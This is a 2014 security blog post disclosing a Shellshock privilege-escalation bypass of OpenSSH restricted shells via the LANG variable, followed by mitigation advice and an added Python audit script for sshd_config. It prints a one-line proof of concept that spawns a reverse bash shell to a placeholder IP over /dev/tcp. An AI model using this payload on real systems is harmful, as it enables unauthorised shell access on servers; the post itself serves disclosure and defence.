Zdziarski
DFIR, security, reverse engineering, photography, theology, funky bass guitar. All opinions are my own.

Shellshock OpenSSH restricted shell RCE/PE Proof of Concept

On September 26, 2014 by Jonathan Zdziarski

Synopsis:

The sshd daemon used in OpenSSH supports a ForceCommand directive, allowing shell logins to be restricted to specific commands. This is often used in configuring sshd for cvs/git accounts, restricted shells, or management scripts. The ForceCommand directive can be employed system wide, or just for specific users.

Vulnerability:

By default, sshd is configured to allow the LANG environment variable to be passed through prior to execution of the restricted shell. On systems vulnerable to the bash/shellshock vulnerability, LANG can be set in such a way that it spawns a remote shell or executes other code on the server, effectively bypassing the forced command and allowing full account access. This can be taken advantage of only after the user has authenticated via ssh, so such systems are at risk only from abuse by their own authorized users. Such users are normally restricted from executing arbitrary commands, however, so in these cases this is more of a privilege escalation. The vulnerability can be even more dangerous on systems with open restricted accounts, in which case it becomes an RCE risk.

The following code invokes an ssh session that will use shellshock to spawn a remote shell on port 8000 to the IP address at A.B.C.D.

$ env LANG='() { :; }; /bin/bash -i >& /dev/tcp/A.B.C.D/8000 0>&1' ssh target_host

[Screenshot: local demonstration on Mac OS X Mavericks]

[Screenshot: demonstrated remotely on a vulnerable Linux machine]

Recommendations:

It is recommended that the following AcceptEnv directives be removed from sshd_config:

AcceptEnv LANG LC_*

Other standard installations of OpenSSH include additional AcceptEnv directives, which should also be removed; for example, many Linux distributions accept LANGUAGE, XMODIFIERS, and other environment variables. Removing these directives prevents sshd from passing LANG and related environment variables through to the forced command. Other environment variables may still be affected, however, so the full solution is to patch for the shellshock vulnerability.
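To check a server against the recommendation above, the following added example (not part of the original post) audits sshd_config text and reports, for each scope where a ForceCommand applies, which locale-style variables a client could still pass through AcceptEnv. The sample config, the function names and the probe list are constructed for illustration, and it assumes global AcceptEnv patterns remain in effect inside Match blocks.

```python
import fnmatch
import re

# Constructed sample sshd_config (illustrative; not from the original post).
SAMPLE_CONFIG = """\
AcceptEnv LANG LC_*
acceptenv LANGUAGE XMODIFIERS
Subsystem sftp /usr/libexec/sftp-server

Match User git
    ForceCommand /usr/local/bin/git-wrapper
Match Group admins
    X11Forwarding yes
"""

def parse_sshd_config(text):
    """Map each scope ("global" or a Match line) to its AcceptEnv patterns
    and ForceCommand. Include directives are not followed."""
    scopes = {"global": {"acceptenv": [], "forcecommand": None}}
    scope = "global"
    for raw in text.splitlines():
        line = raw.strip()
        # Keywords are case-insensitive; '=' may separate keyword and value.
        m = re.match(r"([A-Za-z0-9]+)(?:\s*=\s*|\s+)(.*)$", line)
        if not m or line.startswith("#"):
            continue
        key, args = m.group(1).lower(), m.group(2)
        if key == "match":
            scope = "Match " + args
            scopes.setdefault(scope, {"acceptenv": [], "forcecommand": None})
        elif key == "acceptenv":
            scopes[scope]["acceptenv"] += args.split()
        elif key == "forcecommand" and scopes[scope]["forcecommand"] is None:
            scopes[scope]["forcecommand"] = args
    return scopes

def forced_command_exposure(text, probe=("LANG", "LC_ALL", "LANGUAGE", "XMODIFIERS")):
    """For every scope where a forced command applies, list which probe
    variables a client could still set. Assumption: global AcceptEnv
    patterns stay in effect inside Match blocks."""
    scopes = parse_sshd_config(text)
    glob = scopes["global"]
    report = {}
    for name, s in scopes.items():
        if not (s["forcecommand"] or glob["forcecommand"]):
            continue
        pats = glob["acceptenv"] + (s["acceptenv"] if s is not glob else [])
        report[name] = sorted(v for v in probe
                              if any(fnmatch.fnmatchcase(v, p) for p in pats))
    return report

if __name__ == "__main__":
    for scope, names in forced_command_exposure(SAMPLE_CONFIG).items():
        print(scope, "->", names or "no probe variables accepted")
```

An empty list for a scope means the forced command no longer receives any of the probed variables from the client; it says nothing about whether bash itself is patched.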

 

 

All Content Copyright (c) 2000-2022 by Jonathan Zdziarski, All Rights Reserved